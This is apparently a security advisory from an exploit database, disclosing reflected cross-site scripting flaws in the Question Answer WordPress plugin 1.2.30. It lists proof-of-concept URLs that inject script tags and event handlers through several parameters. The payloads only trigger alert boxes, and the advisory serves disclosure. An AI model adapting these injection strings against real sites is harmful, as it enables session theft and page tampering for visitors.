WordPress Question Answer 1.2.30 Cross Site Scripting

2018.10.25
Credit: Socket_0x03
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

========================================================================================== Question Answer v1.2.30 (WordPress Plugin) - Multiple Cross-Site Scripting Vulnerabilities ========================================================================================== ____________________________________________________________________________________ # Exploit Title: Question Answer v1.2.30 (WordPress Plugin) - Multiple XSS Vulnerabilities # Date: [10-22-2018] # Category: Webapps ____________________________________________________________________________________ # Author: Socket_0x03 (Alvaro J. Gene) # Email: Socket_0x03 (at) teraexe (dot) com # Website: www.teraexe.com ____________________________________________________________________________________ # Software Link: https://wordpress.org/plugins/question-answer # Plugin: Question Answer # Version: v1.2.30 (last version) # Files: qa-profile, my-account, and add-question. # Parameters: ID, arbitrarily supplied URL, _ajax_linking_nonce, and wp-link-submit. # Language: This application is available in English language. # Plugin Description: A WordPress plugin to create questions and answers. ____________________________________________________________________________________ # Cross-Site Scripting Vulnerabilities: File: qa-profile. Parameter: ID. http://www.website.com/wordpress/index.php/qa-profile/?id=ea64j"%20onmouseover%3dalert(23)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20yhw7f&tab=answers File: my-account. Name of an arbitrarily supplied URL. http://www.website.com/wordpress/index.php/my-account/?sjy9u"><script>alert(23)</script>ol1w6=1 File: add-question Parameter: _ajax_linking_nonce. http://www.website.com/wordpress/index.php/add-question/?_ajax_linking_nonce=lbru8"><script>alert(23)</script>bj9c6&wp-link-submit=Add%2bLink File: add-question Name of an arbitrarily supplied URL. http://www.website.com/wordpress/index.php/add-question/?nzvgp"><script>alert(23)</script>go4hd=1 File: add-question Parameter: wp-link-submit. http://www.website.com/wordpress/index.php/add-question/?_ajax_linking_nonce=4316224e28&wp-link-submit=ytu1v"><script>alert(23)</script>vev62&_ajax_linking_nonce=4316224e28&wp-link-submit=Add%2bLink&_ajax_linking_nonce=4316224e28&wp-link-submit=Add%2bLink


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top